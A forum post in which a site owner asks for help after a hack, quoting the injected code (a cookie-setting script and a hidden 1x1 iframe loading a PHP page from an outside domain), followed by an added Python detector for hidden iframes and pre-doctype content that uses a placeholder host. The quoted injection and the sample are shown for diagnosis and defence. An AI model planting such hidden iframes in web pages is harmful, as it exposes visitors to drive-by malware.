My site got hacked last night or early this morning, and I'm having a heck of a time figuring out how to address the issue.
I got warnings emailed to me from Google, and if you navigate to groundtradesxchange-dot-com, you'll likely get a big warning page before you'll need to agree to bypass to see any pages.
But the injected code seems really tricky. I've actually only been able to spot it once via view source, and it seems once I see it on a page, I refresh that page and it's gone.
Anyway - the injected code I found appeared before the html doctype declaration, and was the following:
Code:
<script>
function SetCookie(cookieName,cookieContent){
  var cookiePath = '/';
  var expDate=new Date();
  expDate.setTime(expDate.getTime()+372800000);
  var expires=expDate.toGMTString();
  document.cookie=cookieName+"="+escape(cookieContent)+";path="+escape(cookiePath)+";expires="+expires;
}
SetCookie("pillaala", "ldladad");
</script>
<iframe name="4" width="1" height="1" scrolling="no" frameborder="no" marginwidth="0" marginheight="0" src="http://www.fratocseo.co.cc/greb.php"></iframe>
What I don't understand is, where do I need to be looking to find where this script is residing? I've searched within the templates, languages and phrases to find even a piece of this code, and have come up empty, which makes me wonder if it's a server thing and not a vbulletin thing. And if that's the case, what should be my next step?
I run other forums on the same server, and they appear unaffected. Possibly related, the unaffected forums are running v 3.8.1, and the affected forum is running v 3.6.8 pl2. (I know, I know. Upgrade. I will, once this is cleared up.)
Any ideas where I should be looking?
This injected code seems to come and go randomly, so I'm having a hard time pinning it down. The url where I was able to find it is here: http://www.groundtradesxchange.com/f...html#post70329 but like I said, it only appeared once. But it shows up enough that Google has posted a warning in their search results and most current browsers post a warning before letting you go through to the page.
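The symptom described in the post (markup arriving before the doctype, together with a 1x1 iframe) can be checked mechanically on saved response bodies, which helps when the injection only shows up on some requests. This is an added example, not part of the original thread; the function names, finding labels and the two sample pages with the `injected.example` host are constructed for illustration.

```python
import re
from html.parser import HTMLParser

DOCTYPE_RE = re.compile(r"<!doctype\b", re.IGNORECASE)

def _tiny(value):
    # "0", "1" or "1px" count as invisible; missing or larger values do not.
    m = re.match(r"\s*(\d+)", value or "")
    return bool(m) and int(m.group(1)) <= 1

class _IframeCollector(HTMLParser):
    """Collects the src of iframes whose width and height are both <= 1."""
    def __init__(self):
        super().__init__()
        self.hidden = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = dict(attrs)
        if _tiny(a.get("width")) and _tiny(a.get("height")):
            self.hidden.append(a.get("src") or "")

def inspect_response(body):
    """Return a list of (label, detail) findings for one HTML response body."""
    findings = []
    m = DOCTYPE_RE.search(body)
    # Pages served without any doctype are not covered by the prefix check.
    prefix = body[:m.start()] if m else ""
    if prefix.strip():
        findings.append(("content-before-doctype", prefix.strip()[:80]))
        if "document.cookie" in prefix:
            findings.append(("cookie-set-before-doctype", ""))
    collector = _IframeCollector()
    collector.feed(body)
    findings.extend(("hidden-iframe", src) for src in collector.hidden)
    return findings

# Constructed samples (not captured traffic): the same page served clean and
# with an injected prefix that uses a placeholder host.
CLEAN = "<!DOCTYPE html>\n<html><body><p>thread</p></body></html>"
INJECTED = ('<script>document.cookie="seen=1;path=/";</script>'
            '<iframe width="1" height="1" src="http://injected.example/x.php">'
            '</iframe>' + CLEAN)

if __name__ == "__main__":
    for name, body in (("clean", CLEAN), ("injected", INJECTED)):
        print(name, inspect_response(body))
```

Run it over several saved copies of the same URL fetched without cookies, since the post reports that the injected markup does not appear on every load.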